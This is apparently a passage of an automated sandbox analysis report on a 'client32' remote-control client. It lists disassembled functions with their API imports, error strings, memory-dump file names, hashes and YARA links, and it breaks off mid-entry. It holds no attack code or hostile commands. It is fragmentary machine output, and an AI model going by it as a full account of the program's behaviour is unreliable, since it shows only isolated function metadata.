                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValuewvsprintf
                                                                                                                                                    • String ID: ($Error %d getting %s
                                                                                                                                                    • API String ID: 141982866-3697087921
                                                                                                                                                    • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                                    • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                                                                    • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                                    • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                                                                    Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                                                                                    • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                                                                                    • API String ID: 2102423945-1777407139
                                                                                                                                                    • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                                                                    • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                                                                                    • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                                                                    • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                                                                                    Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                                                                                    • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                    • API String ID: 0-3856134272
                                                                                                                                                    • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                    • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                                                                                    • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                    • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                                                                                    Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: WTSSendMessageA
                                                                                                                                                    • API String ID: 199729137-1676301106
                                                                                                                                                    • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                                                                                    • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                                                                                    • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                                                                                    • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                                                                                    Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                    • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                                    • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                                                                    • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                                                                    Function 6CA84E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 6CA84E34
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 6CA84E6D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: HttpOpenRequestA
                                                                                                                                                    • API String ID: 199729137-1149044843
                                                                                                                                                    • Opcode ID: f12398a15cb4dccd9e0fd4b95d5c74c7d2f9d7c12b5387933875446c3046541b
                                                                                                                                                    • Instruction ID: 9462278300f26bb352b0f63da444a8b80e8af394ace3e58048e799943054a181
                                                                                                                                                    • Opcode Fuzzy Hash: f12398a15cb4dccd9e0fd4b95d5c74c7d2f9d7c12b5387933875446c3046541b
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF014B2614619AFCB14CF99D884E9B73F8EB8C714F05C619F959D3640D634E891CBA0
                                                                                                                                                    Function 6CA84C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 6CA84C84
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 6CA84CBD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetConnectA
                                                                                                                                                    • API String ID: 199729137-3259999732
                                                                                                                                                    • Opcode ID: b6121efaecec8b478e26fc21346131bb104dd39ba99f90606b5ae696b051a2f3
                                                                                                                                                    • Instruction ID: 39542ad2dbecdf6b2ab774dfc1dea06603ab5a6d94e6ec54f0baefcb24e87d7d
                                                                                                                                                    • Opcode Fuzzy Hash: b6121efaecec8b478e26fc21346131bb104dd39ba99f90606b5ae696b051a2f3
                                                                                                                                                    • Instruction Fuzzy Hash: 6BF014B2614618AFCB14CF99D884E9BB7FCEB8C710F018619F949D3A40D630E8518FA0
                                                                                                                                                    Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 11015049
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                                    • Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                                                    • Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
                                                                                                                                                    • Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
                                                                                                                                                    • Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94
                                                                                                                                                    Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                    • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                                                    • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                                                                                    • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                                                                                    • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                                                                                    Function 6CA84E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 6CA84E94
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,6CA8B421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA84EC1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: HttpQueryInfoA
                                                                                                                                                    • API String ID: 199729137-45432230
                                                                                                                                                    • Opcode ID: c3df9f49c3fa54485db1a72879e8f8e1f24f7390f81ee60439fc53cfd09f9de6
                                                                                                                                                    • Instruction ID: ff274dbff47559d12ad4338921b745e57392efdac6434920c0ccc87f65e90a74
                                                                                                                                                    • Opcode Fuzzy Hash: c3df9f49c3fa54485db1a72879e8f8e1f24f7390f81ee60439fc53cfd09f9de6
                                                                                                                                                    • Instruction Fuzzy Hash: 7CF03AB2604218AFC714DF95D844E9777F8EF48721F00C91AB959D7600D670E8508BB0
                                                                                                                                                    Function 6CA84CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 6CA84CE4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,6CA8B4D8,00000000), ref: 6CA84D11
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
